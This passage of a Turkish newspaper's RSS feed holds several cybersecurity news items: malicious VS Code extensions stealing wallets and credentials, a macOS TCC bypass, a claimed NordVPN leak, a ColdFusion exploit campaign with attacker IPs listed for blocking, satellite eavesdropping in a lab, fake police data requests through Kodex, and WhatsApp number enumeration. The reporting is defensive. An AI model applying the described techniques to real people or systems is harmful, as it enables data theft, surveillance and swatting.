<p data-start="1863" data-end="2297"><strong data-start="1863" data-end="1913">Trojenli Donanım Cüzdanları ve Keychain Hedefi</strong><br>Zararlı yazılımın, 50’den fazla tarayıcı kripto eklentisini, geliştirici hesap bilgilerini ve tarayıcı verilerini hedef almasının yanı sıra artık <strong data-start="2060" data-end="2091">macOS Keychain parolalarına</strong> erişmeye çalıştığı kaydedildi. Ayrıca sistemde <strong data-start="2139" data-end="2170">Ledger Live ve Trezor Suite</strong> gibi donanım cüzdan uygulamalarını tespit ederek, bunları trojenli sürümlerle değiştirmeyi amaçlayan yeni bir yetenek eklendi.</p>
<p data-start="2299" data-end="2627">Koi Security, bu mekanizmanın şu an için başarısız olduğunu ve trojenli cüzdan dosyalarının boş döndüğünü belirtti. Kurum, “Bu durum saldırganların macOS cüzdan trojenlerini henüz hazırlamakta olduğunu ya da altyapının geçiş aşamasında bulunduğunu gösteriyor. Ancak tüm diğer zararlı işlevler aktif durumda.” açıklamasını yaptı.</p>
<p data-start="2629" data-end="2906"><strong data-start="2629" data-end="2661">Binlerce İndirme, Artan Risk</strong><br>OpenVSX üzerinde yayımlanan ve zararlı olduğu tespit edilen eklentilerden bazılarının <strong data-start="2748" data-end="2773">33 bini aşkın indirme</strong> sayısına ulaştığı görüldü. Uzmanlar, bu tür rakamların güvenilirlik algısı oluşturmak için <strong data-start="2865" data-end="2892">manipüle edilebildiğine</strong> dikkat çekti.</p>
<p data-start="2908" data-end="3168">Güvenlik uzmanları, ilgili eklentileri yükleyen geliştiricilerin <strong data-start="2973" data-end="2992">derhal kaldırma</strong>, GitHub parolalarını sıfırlama, npm erişim anahtarlarını iptal etme, sistemlerini detaylı şekilde kontrol etme ve gerekirse işletim sistemini yeniden kurma çağrısında bulundu.</p>
<p data-start="3170" data-end="3305"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>macOS’te Kritik TCC Açığı Gündemde: CVE&#45;2025&#45;43530 ile Hassas Verilere İzinsiz Erişim Mümkün</title>
<link>https://www.ajansexpres.com.tr/macoste-kritik-tcc-acigi-gundemde-cve-2025-43530-ile-hassas-verilere-izinsiz-erisim-mumkun</link>
<guid>https://www.ajansexpres.com.tr/macoste-kritik-tcc-acigi-gundemde-cve-2025-43530-ile-hassas-verilere-izinsiz-erisim-mumkun</guid>
<description><![CDATA[ Apple’ın masaüstü işletim sistemi macOS’te tespit edilen kritik bir güvenlik açığı, saldırganların Transparency, Consent, and Control (TCC) mekanizmasını tamamen aşarak kullanıcı onayı olmadan hassas verilere erişmesine olanak tanıyor. CVE-2025-43530 koduyla takip edilen açık, Apple tarafından macOS 26.2 sürümünde yayımlanan güvenlik güncellemesiyle giderildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695d84651ffc5.webp" length="36124" type="image/jpeg"/>
<pubDate>Wed, 07 Jan 2026 00:54:00 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>macos tcc açığı nedir, cve-2025-43530 güvenlik açığı, macos 26.2 güvenlik güncellemesi, apple tcc bypass sorunu</media:keywords>
<content:encoded><![CDATA[<p><br>macOS işletim sisteminde ortaya çıkarılan <strong data-start="534" data-end="552">CVE-2025-43530</strong> numaralı güvenlik açığının, Apple’ın <strong data-start="590" data-end="634">Transparency, Consent, and Control (TCC)</strong> koruma mekanizmasını tamamen devre dışı bırakabildiği bildirildi. Açık sayesinde saldırganların, kullanıcıdan herhangi bir izin almadan hassas verilere erişebildiği belirtildi.</p>
<p></p>
<p data-start="813" data-end="1124">Güvenlik araştırmacılarının paylaştığı bilgilere göre zafiyet, <strong data-start="876" data-end="901">VoiceOver framework’ü</strong> üzerinden çalışan <strong data-start="920" data-end="939">com.apple.scrod</strong> sistem servisini hedef alıyor. Bu yapı istismar edilerek Apple tarafından imzalanmış süreçler içinde kod çalıştırılabildiği, bunun için yönetici yetkisine gerek duyulmadığı kaydedildi.</p>
<p data-start="1126" data-end="1459"><strong data-start="1126" data-end="1168">Kod Enjeksiyonu ve TOCTOU Birlikteliği</strong><br>Açığın istismar sürecinde iki kritik unsurun bir araya geldiği aktarıldı. Bunların, Apple imzalı süreçlere yönelik <strong data-start="1284" data-end="1303">kod enjeksiyonu</strong> ve bir <strong data-start="1311" data-end="1349">Time-of-Check-Time-of-Use (TOCTOU)</strong> yarış durumu olduğu ifade edildi. Bu kombinasyonun, TCC korumasını tamamen etkisiz hale getirdiği vurgulandı.</p>
<p data-start="1461" data-end="1720">Bu yöntemle saldırganların; <strong data-start="1489" data-end="1620">belgelere erişebildiği, mikrofonu kullanabildiği, Finder ile etkileşime girebildiği ve AppleScript komutlarını çalıştırabildiği</strong>, tüm bunların ise kullanıcıya herhangi bir bildirim gösterilmeden gerçekleştirilebildiği aktarıldı.</p>
<p data-start="1722" data-end="2094"><strong data-start="1722" data-end="1757">Apple’dan Güvenlik Güncellemesi</strong><br>Apple, söz konusu güvenlik açığını <strong data-start="1793" data-end="1807">macOS 26.2</strong> sürümünde yayımladığı güncellemeyle giderdi. Güncelleme kapsamında, <strong data-start="1876" data-end="1917">com.apple.private.accessibility.scrod</strong> yetkisinin süreç denetim belirteci üzerinden doğrulanmasının zorunlu hale getirildiği, bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin kapatıldığı bildirildi.</p>
<p data-start="2096" data-end="2310">Apple, macOS 26.2 güvenlik güncellemesine ilişkin teknik detayları resmi güvenlik bülteninde paylaştı. Kullanıcıların, <strong data-start="2215" data-end="2255">Sistem Ayarları &gt; Yazılım Güncelleme</strong> adımlarını izleyerek en son sürüme geçmeleri önerildi.</p>
<p data-start="2312" data-end="2434"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Dark Web Informer NordVPN iddiasını duyurdu: “Salesforce veritabanı ve API anahtarları sızdırıldı”</title>
<link>https://www.ajansexpres.com.tr/dark-web-informer-nordvpn-iddiasini-duyurdu-salesforce-veritabani-ve-api-anahtarlari-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/dark-web-informer-nordvpn-iddiasini-duyurdu-salesforce-veritabani-ve-api-anahtarlari-sizdirildi</guid>
<description><![CDATA[ Siber güvenlik izleme platformu Dark Web Informer, NordVPN’e ait Salesforce ve Jira verilerinin yer aldığı bir geliştirme sunucusunun ele geçirildiğini öne sürdü. Panama merkezli VPN şirketine ait olduğu belirtilen 10’dan fazla veritabanı kaynak kodu, API anahtarları ve hassas teknik bilgilerin bir dark web forumunda paylaşıldığı iddia edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695b0c1dab12e.webp" length="46936" type="image/jpeg"/>
<pubDate>Mon, 05 Jan 2026 03:56:36 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>nordvpn veri sızıntısı iddiası, dark web informer nordvpn haberi, salesforce api anahtarı sızıntısı, vpn şirketi siber saldırı</media:keywords>
<content:encoded><![CDATA[<p><br>Siber tehdit istihbarat hesabı <strong data-start="512" data-end="533">Dark Web Informer</strong>, NordVPN’e yönelik ciddi bir veri sızıntısı iddiasını kamuoyuna duyurdu. Paylaşıma göre, <strong data-start="623" data-end="633">“1011”</strong> takma adlı bir tehdit aktörü, NordVPN’in geliştirme ortamına yetkisiz erişim sağladığını ve kritik sistem verilerini ele geçirdiğini öne sürdü.</p>
<p></p>
<p data-start="779" data-end="1063"><strong data-start="779" data-end="812">Dark Web Forumunda Paylaşıldı</strong><br>Dark Web Informer tarafından aktarılan bilgilere göre, sızdırıldığı iddia edilen veriler bir dark web forumunda satışa veya paylaşıma açıldı. Tehdit aktörü, ele geçirilen bilgilerin <strong data-start="995" data-end="1045">NordVPN’e ait Salesforce veritabanı içerikleri</strong> olduğunu savundu.</p>
<p data-start="1065" data-end="1328"><strong data-start="1065" data-end="1099">Brute Force ile Erişim İddiası</strong><br>Paylaşımda, saldırganın <strong data-start="1124" data-end="1221">yanlış yapılandırılmış bir NordVPN geliştirme sunucusunu brute force yöntemiyle ele geçirdiği</strong> ileri sürüldü. Bu sunucuda Salesforce ve Jira sistemlerine ait bilgilerin birlikte tutulduğu iddia edildi.</p>
<p data-start="1330" data-end="1606"><strong data-start="1330" data-end="1366">Sızdırıldığı Öne Sürülen Veriler</strong><br>Dark Web Informer, tehdit aktörünün paylaştığını iddia ettiği örnekler üzerinden şu bilgilerin ele geçirildiğini bildirdi:<br>10’dan fazla veritabanı kaynak kodu, Salesforce API anahtarları, Jira erişim tokenları ve ek hassas teknik bilgiler.</p>
<p data-start="1608" data-end="1909"><strong data-start="1608" data-end="1636">SQL Dökümleri Paylaşıldı</strong><br>Forumda yayınlanan örnek SQL dökümlerinde, <strong data-start="1680" data-end="1713">“salesforce_api_step_details”</strong> ve <strong data-start="1717" data-end="1731">“api_keys”</strong> tablolarına ait yapılar ile ayrıntılı veritabanı şema bilgilerinin yer aldığı öne sürüldü. Bu örneklerin, iddiaların gerçekliğini desteklemek amacıyla paylaşıldığı ifade edildi.</p>
<p data-start="1911" data-end="2207"><strong data-start="1911" data-end="1952">NordVPN’den Resmî Açıklama Bekleniyor</strong><br>Sızıntı iddialarına ilişkin olarak NordVPN tarafından şu ana kadar kamuoyuna yansımış resmî bir açıklama bulunmuyor. Uzmanlar, iddiaların doğrulanması hâlinde bunun <strong data-start="2118" data-end="2195">VPN hizmetlerine duyulan güven açısından önemli sonuçlar doğurabileceğini</strong> belirtiyor.</p>
<p data-start="2209" data-end="2346"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Küresel siber saldırı dalgasında Adobe ColdFusion sunucuları hedefte: 2,5 milyonu aşan kötü amaçlı istek tespit edildi</title>
<link>https://www.ajansexpres.com.tr/kuresel-siber-saldiri-dalgasinda-adobe-coldfusion-sunuculari-hedefte-25-milyonu-asan-koetu-amacli-istek-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/kuresel-siber-saldiri-dalgasinda-adobe-coldfusion-sunuculari-hedefte-25-milyonu-asan-koetu-amacli-istek-tespit-edildi</guid>
<description><![CDATA[ Adobe ColdFusion sunucularına yönelik 2,5 milyondan fazla kötü amaçlı isteğin kaydedildiği geniş çaplı bir siber saldırı kampanyası ortaya çıktı. 47’den fazla teknoloji platformunu etkileyen saldırıların büyük bölümünün Noel Günü gerçekleşmesi, saldırganların düşük güvenlik farkındalığını hedef aldığını gösterdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695a448bbf9ba.webp" length="45286" type="image/jpeg"/>
<pubDate>Sun, 04 Jan 2026 13:44:56 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>adobe coldfusion siber saldırı kampanyası, noel günü siber saldırılar, cve-2022-26134 ognl injection, java tabanlı sistemler güvenlik açıkları</media:keywords>
<content:encoded><![CDATA[<p><br>Siber güvenlik araştırmacıları, <strong data-start="514" data-end="547">Adobe ColdFusion sunucularını</strong> da kapsayan <strong data-start="560" data-end="620">küresel ölçekte koordine edilmiş bir istismar kampanyası</strong> yürütüldüğünü açıkladı. Analizlere göre, <strong data-start="662" data-end="703">2,5 milyondan fazla kötü amaçlı istek</strong>, ColdFusion başta olmak üzere 47’den fazla farklı teknoloji platformuna yöneltildi.</p>
<p></p>
<p data-start="789" data-end="1130"><strong data-start="789" data-end="845">20 Yıllık Açıklardan Güncel Zafiyetlere Kadar Tarama</strong><br>Uzmanlar, saldırıların hem <strong data-start="873" data-end="915">20 yıla varan eski güvenlik açıklarını</strong> hem de <strong data-start="923" data-end="975">2023–2024 döneminde açıklanan kritik zafiyetleri</strong> hedef aldığını belirtti. ColdFusion’a odaklanan aşamada, <strong data-start="1033" data-end="1074">10’dan fazla kritik güvenlik açığının</strong> aktif biçimde istismar edilmeye çalışıldığı kaydedildi.</p>
<p data-start="1132" data-end="1394"><strong data-start="1132" data-end="1173">Saldırıların Zamanlaması Dikkat Çekti</strong><br>Saldırı trafiğinin <strong data-start="1193" data-end="1220">yüzde 68’inin Noel Günü</strong> gerçekleştiği bilgisi paylaşıldı. Araştırmacılar, bu zamanlamanın <strong data-start="1287" data-end="1352">SOC ekiplerinin düşük kapasiteyle çalıştığı tatil dönemlerini</strong> bilinçli olarak hedef aldığını vurguladı.</p>
<p data-start="1396" data-end="1722"><strong data-start="1396" data-end="1431">Saldırı Kaynakları ve Teknikler</strong><br>Analizlerde, saldırı trafiğinin büyük bölümünün <strong data-start="1480" data-end="1499">134.122.136.119</strong> ve <strong data-start="1503" data-end="1521">134.122.136.96</strong> IP adreslerinden geldiği tespit edildi. Kampanya kapsamında <strong data-start="1582" data-end="1622">Interactsh ile out-of-band doğrulama</strong>, <strong data-start="1624" data-end="1670">WDDX deserialization açıklarının istismarı</strong> ve <strong data-start="1674" data-end="1710">JNDI/LDAP enjeksiyon saldırıları</strong> kullanıldı.</p>
<p data-start="1724" data-end="2023"><strong data-start="1724" data-end="1755">Öne Çıkan Güvenlik Açıkları</strong><br>Saldırılarda en sık hedef alınan zafiyetler arasında <strong data-start="1809" data-end="1855">CVE-2022-26134 (Confluence OGNL Injection)</strong> ve <strong data-start="1859" data-end="1889">CVE-2014-6271 (Shellshock)</strong> yer aldı. Uzmanlar, ColdFusion’un bu kampanyanın yalnızca bir parçası olduğunu, saldırı yüzeyinin çok daha geniş olduğunu ifade etti.</p>
<p data-start="2025" data-end="2300"><strong data-start="2025" data-end="2047">Acil Önlem Çağrısı</strong><br>Güvenlik ekiplerine, ilgili IP adreslerinin ve bağlantılı ASN’lerin engellenmesi, <strong data-start="2130" data-end="2202">ColdFusion ve Java tabanlı altyapıların öncelikli olarak yamalanması</strong> ve özellikle <strong data-start="2216" data-end="2278">tatil dönemlerine ait log kayıtlarının detaylı incelenmesi</strong> çağrısında bulunuldu.</p>
<p data-start="2302" data-end="2459"><strong data-start="2302" data-end="2314"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Ekoparty’de Tanıtılan PWNSAT Projesiyle Uydu Haberleşmesinin Nasıl Dinlenebildiği Adım Adım Gösterildi</title>
<link>https://www.ajansexpres.com.tr/ekopartyde-tanitilan-pwnsat-projesiyle-uydu-haberlesmesinin-nasil-dinlenebildigi-adim-adim-goesterildi</link>
<guid>https://www.ajansexpres.com.tr/ekopartyde-tanitilan-pwnsat-projesiyle-uydu-haberlesmesinin-nasil-dinlenebildigi-adim-adim-goesterildi</guid>
<description><![CDATA[ Dünyanın önde gelen İspanyolca konuşulan siber güvenlik konferansı Ekoparty’de tanıtılan açık kaynaklı PWNSAT 0.1 projesi, uydu haberleşmelerinin ne kadar savunmasız olabildiğini ortaya koydu. Araştırmacılar, yazılım tabanlı radyo kullanarak bir uydunun telemetri ve telekomut verilerinin nasıl ele geçirilebildiğini teknik ayrıntılarıyla paylaştı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695a3f367aa76.webp" length="39840" type="image/jpeg"/>
<pubDate>Sun, 04 Jan 2026 13:21:55 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>PWNSAT projesi nedir, Ekoparty siber güvenlik konferansı, uydu haberleşmesi nasıl dinlenir, LoRa uydu iletişimi güvenliği</media:keywords>
<content:encoded><![CDATA[<p><br>Dünyanın en büyük İspanyolca konuşulan siber güvenlik konferanslarından Ekoparty’de, <strong data-start="585" data-end="599">PWNSAT 0.1</strong> adlı açık kaynaklı ve bilerek zafiyetli tasarlanan uydu altyapı projesi kamuoyuna tanıtıldı. Proje, uydu ve havacılık siber güvenliği alanındaki bilgi eksikliğine dikkat çekmeyi ve uygulamalı araştırmayı teşvik etmeyi amaçlıyor.</p>
<p></p>
<p data-start="830" data-end="1168">Araştırmacılar tarafından paylaşılan teknik çalışmada, <strong data-start="885" data-end="962">PWNSAT ile yer istasyonu arasındaki haberleşmenin pasif olarak dinlenmesi</strong> ayrıntılı biçimde belgelendi. Çalışmada, yazılım tabanlı radyo sistemleri kullanılarak uyduya ait <strong data-start="1061" data-end="1146">telemetri ve telekomut sinyallerinin tespit edilmesi, yakalanması ve çözümlenmesi</strong> adım adım gösterildi.</p>
<p data-start="1170" data-end="1595"><strong data-start="1170" data-end="1217">Yazılım Tabanlı Radyo ile Dinleme Senaryosu</strong><br>Araştırmada, gerçek dünyadaki bir dinleme saldırısını taklit eden bir laboratuvar ortamı kuruldu. Hedef olarak, donanımı, yazılımı ve yer istasyonu bileşenleriyle bilerek savunmasız bırakılan <strong data-start="1410" data-end="1432">PWNSAT 0.1 FlatSat</strong> sistemi seçildi. RTL-SDR ve HackRF One cihazları ile açık kaynak yazılımlar kullanılarak, uydunun aşağı yönlü telemetri ve yukarı yönlü telekomut trafiği izlendi.</p>
<p data-start="1597" data-end="1910"><strong data-start="1597" data-end="1633">“Gizli Frekans Güvenli Değildir”</strong><br>Spektrum taraması sonucunda, uydunun LoRa tabanlı haberleşme yaptığı <strong data-start="1703" data-end="1727">915 MHz ISM bandında</strong> belirgin sinyal patlamaları tespit edildi. Araştırmacılar, bu bulgunun “gizli frekans” yaklaşımının tek başına bir güvenlik önlemi olmadığını açık biçimde ortaya koyduğunu vurguladı.</p>
<p data-start="1912" data-end="2280"><strong data-start="1912" data-end="1951">Şifreleme Olmadan Aktarılan Veriler</strong><br>Çalışmada, CCSDS Space Packet Protocol kullanan telemetri verilerinin uygulama katmanında şifrelenmemiş olması nedeniyle, ham radyo sinyallerinin <strong data-start="2098" data-end="2146">anlamlı sensör verilerine dönüştürülebildiği</strong> gösterildi. BME280 ve MPU6050 sensörlerinden gelen çevresel ve hareket verilerinin gerçek zamanlı olarak çözümlenebildiği kaydedildi.</p>
<p data-start="2282" data-end="2615"><strong data-start="2282" data-end="2321">Gelecekteki Risklere Dikkat Çekildi</strong><br>Araştırmacılar, pasif dinlemenin çoğu zaman son adım olmadığını belirterek, telemetri verilerinin ele geçirilmesinin uydunun çalışma döngülerini ve sağlık durumunu açığa çıkardığını ifade etti. Bu durumun, daha ileri mantıksal ya da fiziksel saldırılar için zemin hazırlayabileceği kaydedildi.</p>
<p data-start="2617" data-end="2865">Paylaşılan çalışmada, tüm deneylerin <strong data-start="2654" data-end="2723">eğitim ve araştırma amacıyla, kontrollü bir laboratuvar ortamında</strong> gerçekleştirildiği özellikle vurgulandı. Yetkisiz uydu haberleşmesi dinlemenin ulusal ve uluslararası hukuka aykırı olabileceği hatırlatıldı.</p>
<p data-start="2867" data-end="3003"><strong data-start="2867" data-end="2879"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Uzmanları Uyardı: Kodex EDR Sistemi Sahte Polis Kimlikleriyle Küresel Bir Veri Silahına Dönüştü</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmanlari-uyardi-kodex-edr-sistemi-sahte-polis-kimlikleriyle-kuresel-bir-veri-silahina-doenustu</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmanlari-uyardi-kodex-edr-sistemi-sahte-polis-kimlikleriyle-kuresel-bir-veri-silahina-doenustu</guid>
<description><![CDATA[ Kodex Global üzerinden yürütülen sahte Emergency Data Request taleplerinin, çalıntı devlet e-postaları kullanılarak kripto borsalarından sosyal ağlara kadar geniş bir alanda kişisel verileri açığa çıkardığı ortaya konuldu. Uzmanlar, sistemin 2024’ten bu yana yeraltı piyasasında organize bir hizmet modeline dönüştüğünü ve fiziksel şiddete varan sonuçlar doğurduğunu belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695a3ba7c3e52.webp" length="59860" type="image/jpeg"/>
<pubDate>Sun, 04 Jan 2026 13:06:58 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>kodex edr nedir, fake emergency data request nasıl çalışır, kodex global siber güvenlik riski, sahte polis epostası edr</media:keywords>
<content:encoded><![CDATA[<p><br>Siber tehdit istihbaratı araştırmaları, <strong data-start="564" data-end="595">Kodex Global EDR sisteminin</strong> kötüye kullanımının münferit olaylar olmaktan çıktığını ve küresel ölçekte organize bir yeraltı hizmetine dönüştüğünü ortaya koydu. Tehdit aktörlerinin, sahte polis ve kamu görevlisi kimlikleriyle şirketlerden ve platformlardan acil veri taleplerinde bulunduğu belirtildi.</p>
<p></p>
<p data-start="870" data-end="1292"><strong data-start="870" data-end="899">BreachForums’ta İlk Alarm</strong><br>2024’ün başlarında “Tamagami” adlı bir tehdit aktörünün BreachForums’ta yaptığı paylaşım, sistemin nasıl istismar edildiğini gözler önüne serdi. Söz konusu paylaşımda, “Kodex Global hesabımı satıyorum. Binance veya Coinbase üzerinden EDR ile istediğiniz kişiyi sorgulayabilirsiniz.” ifadeleri yer aldı. İddialara göre tekil sorgu bedelleri 300 dolara, tam erişim ise 5 bin dolara kadar çıktı.</p>
<p data-start="1294" data-end="1635"><strong data-start="1294" data-end="1341">Hedefte Sosyal Ağlar ve Kripto Platformları</strong><br>Araştırmalara göre Kodex üzerinden yapılan sahte acil talepler yalnızca kripto borsalarıyla sınırlı kalmadı. Discord, Tinder ve LinkedIn gibi sosyal platformların da listede yer aldığı, bu yolla kullanıcıların IP adresleri, telefon numaraları ve fiziksel adreslerinin elde edildiği kaydedildi.</p>
<p data-start="1637" data-end="2086"><strong data-start="1637" data-end="1671">Sistem Nasıl İstismar Ediliyor</strong><br>Uzmanlar, Kodex altyapısının teknik olarak güvenli olduğunu ancak insan faktörünün zayıf halka haline geldiğini vurguladı. Sürecin, bilgi hırsızlığı zararlıları ve oltalama saldırılarıyla ele geçirilen .gov ve .police uzantılı e-posta hesaplarıyla başladığı aktarıldı. Bu adreslerle Kodex’e kayıt yapıldığı ve “hayati tehlike” veya “terör şüphesi” gibi gerekçelerle platformlardan veri talep edildiği ifade edildi.</p>
<p data-start="2088" data-end="2464"><strong data-start="2088" data-end="2117">“EDR as a Service” Dönemi</strong><br>Şubat 2025 tarihli paylaşımlar, sahte Kodex hesaplarının fiyatlarının 400 dolara kadar düştüğünü gösterdi. Bu durumun, düşük profilli saldırganların da sistemi kullanabilir hale gelmesine yol açtığı bildirildi. Aralık 2025 itibarıyla bazı grupların, “doğrulanmış Avrupa devlet e-postalarıyla EDR geçeriz” şeklinde açık ilanlar verdiği kaydedildi.</p>
<p data-start="2466" data-end="2840"><strong data-start="2466" data-end="2500">Sanal Veriden Fiziksel Tehdide</strong><br>Elde edilen adres ve iletişim bilgilerinin yalnızca ifşa için değil, fiziksel tehditler için de kullanıldığı belirtildi. Uzmanlar, saldırganların bu verilerle sahte bomba ihbarı veya rehine bildirimi yaparak polis ekiplerini hedef adreslere yönlendirdiğini, bu yöntemin geçmişte ABD’de ölümle sonuçlanan olaylara neden olduğunu hatırlattı.</p>
<p data-start="2842" data-end="3260"><strong data-start="2842" data-end="2890">APT Grupları ve Fidye Çeteleri de Kullanıyor</strong><br>Analizlerde, Lapsus$ ve Scattered Spider gibi organize grupların yanı sıra devlet destekli APT yapılanmalarının da Kodex EDR’yi stratejik bir araç olarak gördüğü ifade edildi. Fidye gruplarının, şirket yöneticilerinin aile bireylerine ulaşarak baskıyı artırdığı; APT gruplarının ise diplomat, gazeteci ve muhalifleri zararlı yazılım kullanmadan izleyebildiği aktarıldı.</p>
<p data-start="3262" data-end="3392"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Araştırmacısı Ebubekir Bastama WhatsApp Web’in Numara Doğrulama Mekanizmasını 100 Bin Numara Üzerinden Analiz Etti</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-arastirmacisi-ebubekir-bastama-whatsapp-webin-numara-dogrulama-mekanizmasini-100-bin-numara-uzerinden-analiz-etti</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-arastirmacisi-ebubekir-bastama-whatsapp-webin-numara-dogrulama-mekanizmasini-100-bin-numara-uzerinden-analiz-etti</guid>
<description><![CDATA[ Siber Güvenlik Araştırmacısı Ebubekir Bastama tarafından yayımlanan teknik makalede, WhatsApp Web istemcisinin numara doğrulama davranışı 100 bin telefon numarası üzerinden incelendi. Çalışma, resmi istemci API’leri kullanılarak yapılan testlerde %100 doğrulukla doğrulama sonuçları elde edildiğini ortaya koydu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_69554615b5e30.webp" length="14776" type="image/jpeg"/>
<pubDate>Wed, 31 Dec 2025 18:50:08 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>whatsapp web numara doğrulama analizi, ebubekir bastama siber güvenlik araştırması, whatsapp web rate limit testi, whatsapp osint teknik inceleme</media:keywords>
<content:encoded><![CDATA[<p><br>Siber Güvenlik Araştırmacısı <strong data-start="508" data-end="528">Ebubekir Bastama</strong>, WhatsApp Web istemcisinin telefon numarası doğrulama davranışına ilişkin kapsamlı bir teknik inceleme yayımladı. Çalışmada, WhatsApp Web’in resmi istemci davranışları temel alınarak gerçekleştirilen testlerde, numaraların WhatsApp kullanıcısı olup olmadığının sunucu taraflı doğrulama mekanizmalarıyla belirlendiği kaydedildi.</p>
<p></p>
<p data-start="858" data-end="1160"><strong data-start="858" data-end="898">100 Bin Numara Üzerinden Teknik Test</strong><br>Ebubekir Bastama tarafından yürütülen çalışmada, <strong data-start="948" data-end="991">100.000 adet benzersiz telefon numarası</strong> WhatsApp Web istemcisi üzerinden ayrı ayrı test edildi. Test süreci boyunca herhangi bir hız kısıtı, engelleme veya rate-limit davranışıyla karşılaşılmadığı belirtildi.</p>
<p data-start="1162" data-end="1506"><strong data-start="1162" data-end="1200">Resmi İstemci Katmanları İncelendi</strong><br>Araştırmada, WhatsApp Web arayüzünün normal işleyişinde kullandığı <strong data-start="1268" data-end="1284">ContactStore</strong> ve <strong data-start="1288" data-end="1301">ChatStore</strong> bileşenleri analiz edildi. Bastama, bu yapıların profil bilgileri, sohbet başlıkları ve kullanıcı durumlarının istemciye yansıtılmasında kullanılan resmi istemci API’lerinin çıktıları olduğunu ifade etti.</p>
<p data-start="1508" data-end="1824"><strong data-start="1508" data-end="1546">Sunucu Taraflı Doğrulama Davranışı</strong><br>Yayımlanan bulgulara göre, WhatsApp Web istemcisi, girilen her numara için WhatsApp sunucularıyla arka planda iletişim kurarak doğrulama gerçekleştiriyor. Bu sürecin, arayüzün olağan kullanım kalıpları içinde gerçekleştiği ve anormal bir istek paterni oluşturmadığı vurgulandı.</p>
<p data-start="1826" data-end="2059"><strong data-start="1826" data-end="1864">Değerlendirme Kriterleri Açıklandı</strong><br>Her numara için doğrulama, <strong data-start="1892" data-end="1927">Contact durumu veya Chat durumu</strong> kriterlerine göre yapıldı. Bu göstergelerin, sunucu tarafında gerçekleşen doğrulamanın istemciye yansıyan sonucu olduğu belirtildi.</p>
<p data-start="2061" data-end="2318"><strong data-start="2061" data-end="2093">%100 Doğrulukla Teyit Edildi</strong><br>Ebubekir Bastama, WhatsApp kullanıcısı olan ve olmayan numaraların tamamının doğru şekilde ayrıştırıldığını, test sonuçlarının sonrasında manuel kontrollerle doğrulandığını ve <strong data-start="2270" data-end="2308">%100 doğruluk oranına ulaşıldığını</strong> kaydetti.</p>
<p data-start="2320" data-end="2648"><strong data-start="2320" data-end="2361">Herkese Açık Profil Bilgileri Gözlemi</strong><br>Çalışmada ayrıca, kullanıcıların gizlilik ayarlarıyla herkese açık hale getirdiği <strong data-start="2444" data-end="2508">profil fotoğrafı, görünen isim, işletme adı ve profil durumu</strong> gibi bilgilerin WhatsApp Web istemcisi üzerinden erişilebilir olduğu gözlemlendi. Bu erişimin ek bir doğrulama gerektirmediği ifade edildi.</p>
<p data-start="2650" data-end="2957"><strong data-start="2650" data-end="2691">Güvenlik Açığı Değil, Teknik İnceleme</strong><br>Bastama, çalışmanın bir güvenlik açığı veya istismar niteliği taşımadığını belirtti. İncelenen istemci–sunucu iletişiminin, WhatsApp Web uygulamasının kendi çalışma mantığı içinde kullanılan uç noktalara dayandığı ve herhangi bir yetki aşımı yapılmadığı vurgulandı.</p>
<p data-start="2959" data-end="3225"><strong data-start="2959" data-end="2983">Etik Çerçeve Vurgusu</strong><br>Araştırmacı Ebubekir Bastama, elde edilen bulguların yalnızca teknik analiz ve araştırma amacıyla değerlendirildiğini, spam, otomasyon veya izinsiz pazarlama faaliyetlerinde kullanılmasının platform politikalarına aykırı olduğunu ifade etti.</p>
<p data-start="3227" data-end="3383"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Başkanlığına Yeni Yetkiler ve Yapısal Değişiklikler Getiren Cumhurbaşkanlığı Kararnamesi Yürürlüğe Girdi</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-baskanligina-yeni-yetkiler-ve-yapisal-degisiklikler-getiren-cumhurbaskanligi-kararnamesi-yururluge-girdi</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-baskanligina-yeni-yetkiler-ve-yapisal-degisiklikler-getiren-cumhurbaskanligi-kararnamesi-yururluge-girdi</guid>
<description><![CDATA[ Resmî Gazete’de yayımlanan Cumhurbaşkanlığı Kararnamesi ile Siber Güvenlik Başkanlığının görev tanımı genişletildi, dijital devlet mimarisi ve yapay zekâ alanlarına ilişkin yeni birimler kuruldu. Kararname, başkanlığın teşkilat yapısı ile kadrolarında da kapsamlı düzenlemeler içeriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694e537ce9901.webp" length="67616" type="image/jpeg"/>
<pubDate>Fri, 26 Dec 2025 12:21:27 +0300</pubDate>
